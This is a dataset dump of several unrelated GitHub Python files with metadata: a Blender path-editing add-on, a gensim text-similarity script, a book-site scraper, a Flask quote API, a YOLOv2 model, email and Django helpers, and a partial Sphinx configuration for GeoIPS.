bpy.data.images:\n\t\t\ti.filepath=re.sub('\\.\\./','',i.filepath)\n\t\tfor i in bpy.data.fonts:\n\t\t\tif i.filepath != '':\n\t\t\t\ti.filepath=re.sub('\\.\\./','',i.filepath)\n\t\treturn {'FINISHED'}\n\n\nclass KTXIMAGEFONTPATHS_OT_Regex(bpy.types.Operator):\n\t\"\"\"Search and replace paths with regex\"\"\"\n\tbl_idname = \"ktximagefontpaths.regex\"\n\tbl_label = \"Search/Replace\"\n\n\tdef execute(self, context):\n\t\tscene = context.scene\n\t\tfor i in bpy.data.images:\n\t\t\ti.filepath=re.sub(scene.ktx_searchfield, scene.ktx_replacefield,i.filepath)\n\t\tfor i in bpy.data.fonts:\n\t\t\tif i.filepath != '':\n\t\t\t\ti.filepath=re.sub(scene.ktx_searchfield, scene.ktx_replacefield,i.filepath)\n\t\treturn {'FINISHED'}\n\n\nclass KTXIMAGEFONTPATHS_PT_Panel(bpy.types.Panel):\n\t\"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n\tbl_label = \"Image/Font Paths\"\n\tbl_idname = \"KTXIMAGEFONTPATHS_PT_Panel\"\n\tbl_space_type = 'PROPERTIES'\n\tbl_region_type = 'WINDOW'\n\tbl_context = \"scene\"\n\n\tdef draw(self, context):\n\t\tlayout = self.layout\n\n\t\tscene = context.scene\n\n\t\tlayout.label(text=\" Images:\")\n\n\t\tfor i in bpy.data.images:\n\t\t\tif i.filepath != '':\n\t\t\t\tlayout.prop(i,\"filepath\", text=\"\")\n\n\t\tlayout.label(text=\" Fonts:\")\n\n\t\tfor f in bpy.data.fonts:\n\t\t\tif f.filepath != '':\n\t\t\t\tlayout.prop(f,\"filepath\", text=\"\")\n\n\t\tlayout.label(text=\" Tools:\")\n\n\t\tlayout.operator(\"ktximagefontpaths.removeslashdots\")\n\t\tlayout.prop(scene, \"ktx_searchfield\", text=\"Search\")\n\t\tlayout.prop(scene, \"ktx_replacefield\", text=\"Replace\")\n\t\tlayout.operator(\"ktximagefontpaths.regex\")\n\nclasses = (\n\tKTXIMAGEFONTPATHS_OT_RemoveSlashDots,\n\tKTXIMAGEFONTPATHS_OT_Regex,\n\tKTXIMAGEFONTPATHS_PT_Panel\n)\n\ndef register():\n\tbpy.types.Scene.ktx_searchfield = StringProperty(default='', description=\"Search for (regex)\")\n\tbpy.types.Scene.ktx_replacefield = StringProperty(default='', description=\"Replace with (regex)\")\n\tfrom bpy.utils import register_class\n\n\tfor cls in classes:\n\t\tregister_class(cls)\n\n\ndef unregister():\n\tdel bpy.types.Scene.ktx_searchfield\n\tdel bpy.types.Scene.ktx_replacefield\n\tfrom bpy.utils import unregister_class\n\n\tfor cls in classes:\n\t\tunregister_class(cls)\n\n\nif __name__ == \"__main__\":\n\tregister()\n", "repo_name": "kostex/blenderscripts", "sub_path": "KTX_ImageFontPaths.py", "file_name": "KTX_ImageFontPaths.py", "file_ext": "py", "file_size_in_byte": 3660, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bpy.types", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 43, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 44, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 45, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 47, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 51, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 58, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 59, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 60, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 62, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 66, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 81, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 87, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 105, "usage_type": "attribute"}, {"api_name": "bpy.props.StringProperty", "line_number": 105, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 106, "usage_type": "attribute"}, {"api_name": "bpy.props.StringProperty", "line_number": 106, "usage_type": "call"}, {"api_name": "bpy.utils.register_class", "line_number": 110, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 114, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 115, "usage_type": "attribute"}, {"api_name": "bpy.utils.unregister_class", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "44293126936", "text": "import logging\nimport json\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nfrom gensim import corpora\n\nwith open('FFM.json') as data_file:\n FFM = json.load(data_file)\n\ndocuments = FFM['Dansk']['5. - 6. klasse']['færdighed']\nv = \"eleven har viden om af alle alt andre at blev bliver bort da dag de dem den der deres det dig dog du efter eller en end er et far fik fin for forbi fordi frafri få gik glad godt ham han hanshar havde have hele hen hende her hjemhun hvad hver hvis hvor igen ikke indjeg jer jo kan kom kommer kun kunnelang lidt lige lille løb man mange medmeget men mere mig min mod mon måned nej noget nok nu når og ogsåom op os over på sagde se selvsidste sig sin sine skal skulle små somstor store så tid til tog ud undervar ved vi vil ville være været år\"\nstoplist = set(v.split())\n\ntexts = [[word for word in document.lower().split() if word not in stoplist]\n for document in documents]\n\nfrom pprint import pprint # pretty-printer\npprint(texts)\n\ndictionary = corpora.Dictionary(texts)\ndictionary.save('/tmp/tmm.dict') # store the dictionary, for future reference\nprint(dictionary)\n\ncorpus = [dictionary.doc2bow(text) for text in texts]\ncorpora.MmCorpus.serialize('/tmp/tmm.mm', corpus) \n\n\nfrom gensim import corpora, models, similarities\ndictionary = corpora.Dictionary.load('/tmp/tmm.dict')\ncorpus = corpora.MmCorpus('/tmp/tmm.mm') # comes from the first tutorial, \"From strings to vectors\"\n\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=12)\n\ndoc = \"Eleven kan anvende grafiske modeller\"\nvec_bow = dictionary.doc2bow(doc.lower().split())\nvec_lsi = lsi[vec_bow] # convert the query to LSI space\n\nindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\nindex.save('/tmp/deerwester.index')\nindex = similarities.MatrixSimilarity.load('/tmp/deerwester.index')\n\nsims = index[vec_lsi] # perform a similarity query against the corpus\n#print(list(enumerate(sims))) # print (document_number, document_similarity) 2-tuples\nsims = sorted(enumerate(sims), key=lambda item: -item[1])\n#pprint(sims) # print sorted (document number, similarity score) 2-tuples\n\nwhile True:\n\tdoc = input('Skriv læringsmål, skriv q for at afslutte: ')\n\tif doc == 'q':\n\t\tbreak\n\tvec_bow = dictionary.doc2bow(doc.lower().split())\n\tvec_lsi = lsi[vec_bow] # convert the query to LSI space\n\n\tindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\n\tsims = index[vec_lsi] # perform a similarity query against the corpus\n\t#print(list(enumerate(sims))) # print (document_number, document_similarity) 2-tuples\n\tsims = sorted(enumerate(sims), key=lambda item: -item[1])\n\t#pprint(sims) # print sorted (document number, similarity score) 2-tuples\n\tfor i in range(5): #number of suggestions to print\n\t\tprint(str(i+1),': % ', str(sims[i][1]), ' ', documents[sims[i][0]],sep='')", "repo_name": "eugene/gyldendal", "sub_path": "analysis.py", "file_name": "analysis.py", "file_ext": "py", "file_size_in_byte": 2915, "program_lang": "python", "lang": "da", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 5, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 20, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 22, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 22, "usage_type": "name"}, {"api_name": "gensim.corpora.MmCorpus.serialize", "line_number": 27, "usage_type": "call"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 27, "usage_type": "attribute"}, {"api_name": "gensim.corpora", "line_number": 27, "usage_type": "name"}, {"api_name": "gensim.corpora.Dictionary.load", "line_number": 31, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 31, "usage_type": "attribute"}, {"api_name": "gensim.corpora", "line_number": 31, "usage_type": "name"}, {"api_name": "gensim.corpora.MmCorpus", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 32, "usage_type": "name"}, {"api_name": "gensim.models.LsiModel", "line_number": 34, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 34, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 40, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 40, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity.load", "line_number": 43, "usage_type": "call"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gensim.similarities", "line_number": 43, "usage_type": "name"}, {"api_name": "gensim.similarities.MatrixSimilarity", "line_number": 57, "usage_type": "call"}, {"api_name": "gensim.similarities", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "32798633285", "text": "# -*- coding: utf-8 -*-\n# coding=utf-8\n\"\"\"\nCreated on Mon Aug 13 11:10:39 2018\n\n@author: 95647\n\"\"\"\nimport urllib\nfrom urllib.parse import quote\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport pandas as pd\nimport string\nfrom mytictoc import tic, toc\n\ntic()\nheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\nurl = \"https://book.douban.com/tag/历史\"\ns = quote(url,safe=string.printable)\nreq = urllib.request.Request(s, headers=headers)\nhtml = urlopen(req)\n# print(html.read().decode(\"utf-8\"))\nbsObj = BeautifulSoup(html,'lxml')\nitems = bsObj.findAll(\"li\",class_=\"subject-item\")\nbook_info = []\nfor item in items:\n info = []\n titles = item.find(\"a\",title = re.compile(\".*\")).contents\n if len(titles)> 1 :\n bookname = str(titles[0].strip()) + str(titles[1].text.strip())\n else:\n bookname = titles[0].strip()\n publication =item.find(\"div\",class_=\"pub\").get_text().strip()\n comments = item.find(\"span\", class_=\"rating_nums\").text.strip()\n num = item.find(\"span\", class_=\"pl\").text.strip()\n brief = item.p.text.strip()\n info.append(bookname)\n info.append(publication)\n info.append(comments)\n info.append(num)\n info.append(brief)\n book_info.append(info)\n \ncolumn = [\"书名\",\"出版社\",\"评分\",\"参与人数\",\"内容简介\"]\nall_books_info = pd.DataFrame(columns=column ,data= book_info)\nall_books_info.to_csv(r\"\"\"C:\\Users\\95647\\Desktop\\douban_books.csv\"\"\")\ntoc() #this scarpy use of total time\n", "repo_name": "starkbling/website_scraping", "sub_path": "douban_scrapy.py", "file_name": "douban_scrapy.py", "file_ext": "py", "file_size_in_byte": 1533, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mytictoc.tic", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 20, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 20, "usage_type": "attribute"}, {"api_name": "urllib.request.Request", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 21, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 46, "usage_type": "call"}, {"api_name": "mytictoc.toc", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "17841361817", "text": "from flask import Flask, render_template, request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom quoter import quoteLister\nimport random\n\napp = Flask(__name__)\nCORS(app, support_credentials=True)\n\n@app.route('/')\n@cross_origin(supports_credentials=True)\ndef success():\n\treturn render_template(\"home.html\")\n\n@app.route('/quote', methods =['GET'])\n\ndef get_quote():\n\ttag = request.args['tag']\n\tcurrentQuoteList = quoteLister(tag)\n\tcurrentQuote = random.choice(currentQuoteList).strip()\n\treturn jsonify({'quote': currentQuote})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port = 5000)\n", "repo_name": "shellkore/quoteBoy", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "quoter.quoteLister", "line_number": 18, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "28535314068", "text": "import torch.nn as nn\nimport torch\nimport math\nfrom torchvision import transforms\nimport torch.nn.functional as F\nimport torchvision.models as tv\nimport cv2\nimport numpy as np\nfrom torch.autograd import Variable\nfrom darknet import Darknet19\n\nclass YOLO_v2(nn.Module):\n def __init__(self):\n self.n_boxes = 5\n self.n_classes = 20\n super(YOLO_v2, self).__init__()\n\n darknet = Darknet19(pretrained=True).features\n\n self.feature = darknet\n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=1024, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(negative_slope=0.1))\n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=1024, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(negative_slope=0.1))\n self.layer3 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=1024, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(negative_slope=0.1))\n self.layer4 = nn.Sequential(\n nn.Conv2d(in_channels=1024, out_channels=(self.n_boxes * (5 + self.n_classes)), kernel_size=(3, 3), padding=1))\n\n def forward(self, x):\n x = self.feature(x)\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n for box in range(0, self.n_boxes * (5 + self.n_classes), (5 + self.n_classes)):\n x[:, box:box+2, :, :] = torch.sigmoid(x[:, box:box+2, :, :]) # x, y\n x[:, box+2:box+4, :, :] = torch.exp(x[:, box+2:box+4, :, :]) # w, h\n x[:, box+4:box+5, :, :] = torch.sigmoid(x[:, box+4:box+5, :, :]) # probability of object\n x[:, box + 5:box + 5 + self.n_classes, :, :] = torch.sigmoid(x[:, box + 5:box + 5 + self.n_classes, :, :]) #class\n return x", "repo_name": "tw0226/YOLO_v2_pytorch", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1916, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "darknet.Darknet19", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "31286740398", "text": "from functools import partial\n\nfrom fastapi_mail import (\n FastMail,\n MessageSchema,\n ConnectionConfig,\n MessageType\n)\n\nfrom app.core.config import settings\n\n\ndef send_email_notification(\n subject: str,\n body: str\n) -> partial | None:\n\n if settings.EMAIL_RECIPIENTS:\n conf = ConnectionConfig(\n MAIL_USERNAME=settings.SMTP_USER,\n MAIL_PASSWORD=settings.SMTP_PASSWORD,\n MAIL_FROM=settings.SMTP_USER,\n MAIL_PORT=settings.SMTP_PORT,\n MAIL_SERVER=settings.SMTP_HOST,\n MAIL_SSL_TLS=settings.SMTP_SSL_TLS,\n MAIL_STARTTLS=True\n )\n\n message = MessageSchema(\n subject=subject,\n recipients=settings.EMAIL_RECIPIENTS,\n body=body,\n subtype=MessageType.plain\n )\n\n fast_mail = FastMail(conf)\n return partial(fast_mail.send_message, message)\n", "repo_name": "Aykhan-s/Portfolio-Blog", "sub_path": "src/app/utils/email_utils.py", "file_name": "email_utils.py", "file_ext": "py", "file_size_in_byte": 910, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "app.core.config.settings.EMAIL_RECIPIENTS", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi_mail.ConnectionConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "app.core.config.settings.SMTP_USER", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_PASSWORD", "line_number": 21, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_USER", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 22, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_PORT", "line_number": 23, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_HOST", "line_number": 24, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 24, "usage_type": "name"}, {"api_name": "app.core.config.settings.SMTP_SSL_TLS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "fastapi_mail.MessageSchema", "line_number": 29, "usage_type": "call"}, {"api_name": "app.core.config.settings.EMAIL_RECIPIENTS", "line_number": 31, "usage_type": "attribute"}, {"api_name": "app.core.config.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "fastapi_mail.MessageType.plain", "line_number": 33, "usage_type": "attribute"}, {"api_name": "fastapi_mail.MessageType", "line_number": 33, "usage_type": "name"}, {"api_name": "fastapi_mail.FastMail", "line_number": 36, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 37, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "514202855", "text": "from collections import deque\ndef solution(s):\n q = deque(s)\n answer = True\n stack = []\n while q:\n temp = q.popleft()\n if temp == '(':\n stack.append(temp)\n elif temp == ')' and stack:\n stack.pop()\n else:\n answer = False\n break\n if stack:\n return False\n return answer", "repo_name": "kypa123/PS", "sub_path": "코테/올바른 괄호_0818.py", "file_name": "올바른 괄호_0818.py", "file_ext": "py", "file_size_in_byte": 363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "25916494341", "text": "from django.db import models\nfrom django.core import checks\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass OrderField(models.PositiveIntegerField):\n \"\"\"We are buidling a new custom field\"\"\"\n \n description = \"Ordering field on a unique field\"\n\n def __init__(self, unique_for_field=None, *args, **kwargs):\n self.unique_for_field = unique_for_field\n super().__init__(*args, **kwargs)\n\n\n def check(self, **kwargs):\n \"\"\"I used docs for CharField and IntegerField to have an idea of how to write this\"\"\"\n return [\n *super().check(**kwargs),\n *self._check_for_field_attribute(**kwargs),\n ]\n \n def _check_for_field_attribute(self, **kwargs):\n if self.unique_for_field is None:\n return [\n checks.Error(\"OrderField must define a 'unique_for_field' attribute\"),\n ]\n elif self.unique_for_field not in [f.name for f in self.model._meta.get_fields()]:\n \"\"\"Checking if the field name provided is not defined in our model\"\"\"\n return [\n checks.Error(\"OrderField entered does not match an existing model field\"),\n ]\n else:\n return []\n \n\n def pre_save(self, model_instance, add):\n \"\"\"Every/Each instance of order number created passes/passed through the pre_save function here\"\"\"\n # print(model_instance)\n if getattr(model_instance, self.attname) is None:\n \"\"\"When no order number value is inputed,\n If there is no order number value inputed, then we would need to generate one.\"\"\"\n qs = self.model.objects.all() #self.model ProductLine model\n # ' Select * from ProductLine where product=\"shoe\" '\n try: # Build your query to filter out all of the Product-Line that belongs to a specific product\n query = {\n self.unique_for_field: getattr(model_instance, self.unique_for_field) \n }# {\"product\": \"Nike shoe\"}\n qs = qs.filter(**query) # print(query) # print(qs)\n last_item = qs.latest(self.attname) #self.attname == order #latest gets the last item\n value = last_item.order+1\n except ObjectDoesNotExist: #If no data in the database, then value = 1, first value\n value = 1\n return value #This saves directly to the order field in the db, #order = OrderField(unique_for_field=\"product\" , blank=True)\n else:\n return super().pre_save(model_instance, add)\n \n \n", "repo_name": "ataime365/django-drf-ecommerce", "sub_path": "ecommerce/product/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.PositiveIntegerField", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 6, "usage_type": "name"}, {"api_name": "django.core.checks.Error", "line_number": 26, "usage_type": "call"}, {"api_name": "django.core.checks", "line_number": 26, "usage_type": "name"}, {"api_name": "django.core.checks.Error", "line_number": 31, "usage_type": "call"}, {"api_name": "django.core.checks", "line_number": 31, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "39390246946", "text": "# # # Distribution Statement A. Approved for public release. Distribution unlimited.\n# # #\n# # # Author:\n# # # Naval Research Laboratory, Marine Meteorology Division\n# # #\n# # # This program is free software: you can redistribute it and/or modify it under\n# # # the terms of the NRLMMD License included with this program. This program is\n# # # distributed WITHOUT ANY WARRANTY; without even the implied warranty of\n# # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the included license\n# # # for more details. If you did not receive the license, for more information see:\n# # # https://github.com/U-S-NRL-Marine-Meteorology-Division/\n\n\"\"\"GeoIPS PKGNAME documentation build configuration file.\"\"\"\nimport sys\nimport os\nimport jinja2\nimport geoips\n\nVERSION = str(geoips.__version__)\n\nsource_path = os.path.dirname(os.path.abspath(__file__))\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n# sys.path.append(os.path.abspath('.'))\nsys.path.insert(0, os.path.abspath(\"../sphinxext\"))\nsys.path.extend(\n [\n # numpy standard doc extensions\n os.path.join(os.path.dirname(__file__), \"..\", \"../..\", \"sphinxext\")\n ]\n)\n\n# Use Jinja for navigational tools\nwith open(os.path.join(source_path, \"_templates/indexrst.html\")) as f:\n t = jinja2.Template(f.read())\nwith open(os.path.join(source_path, \"index.rst\"), \"w\") as f:\n f.write(t.render())\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = \"5.3.0\"\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n \"sphinx_design\",\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.mathjax\",\n \"sphinx.ext.napoleon\",\n \"sphinx.ext.viewcode\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\nsource_suffix = [\".rst\"]\n\n# The encoding of source files.\nsource_encoding = \"utf-8\"\n\n# The master toctree document.\nmaster_doc = \"index\"\n\n# General information about the project.\nproject = \"GeoIPS, Geolocated Information Processing System\"\ncopyright = \"NOT APPLICAPABLE\"\nauthor = \"the U.S. NAVAL RESEARCH LABORATORY\"\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents. Consider setting version=release=VERSION\n#\n# The full version, including alpha/beta/rc tags.\nrelease = \"{0}\".format(VERSION)\n# The short X.Y version.\nversion = \"{0}\".format(VERSION[0:3])\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = \"en\"\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n# today = ''\n# Else, today_fmt is used as the format for a strftime call.\n# today_fmt = '%B %d, %Y'\n\nexclude_patterns = [\n \"**.ipynb_checkpoints\",\n # to ensure that include files (partial pages) aren't built, exclude them\n # https://github.com/sphinx-doc/sphinx/issues/1965#issuecomment-124732907\n \"**/includes/**\",\n]\n\n# The reST default role (used for this markup: `text`) to use for all\n# documents.\n# default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n# add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n# add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n# show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = \"sphinx\"\n\n# A list of ignored prefixes for module index sorting.\n# modindex_common_prefix = []\n\n# If true, keep warnings as \"system message\" paragraphs in the built documents.\n# keep_warnings = False\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = False\n\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = \"pydata_sphinx_theme\"\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\nhtml_theme_options = {\n \"external_links\": [],\n \"footer_end\": [\"geoips_footer\"],\n \"github_url\": \"https://github.com/NRLMMD-GEOIPS/PKGNAME\",\n \"navbar_end\": [\"theme-switcher\", \"navbar-icon-links\"],\n \"logo\": {\n \"image_light\": \"_static/NRL_logo_RGB.jpg\",\n \"image_dark\": \"_static/NRL_logo_sidebar_Reverse.png\",\n },\n}\n\n# Add any paths that contain custom themes here, relative to this directory.\n# html_theme_path = []\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n# html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n# html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\nhtml_logo = \"_static/NRL_logo_sidebar_Reverse.png\"\n\n# The name of an image file (relative to this directory) to use as a favicon of\n# the docs. This file should be a Windows icon file (.ico) being 16x16 or\n# 32x32 pixels large.\nhtml_favicon = \"_static/nrlicon.ico\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n\n# Add any extra paths that contain custom files (such as robots.txt or\n# .htaccess) here, relative to this directory. These files are copied\n# directly to the root of the documentation.\n# html_extra_path = []\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n# html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n# html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template 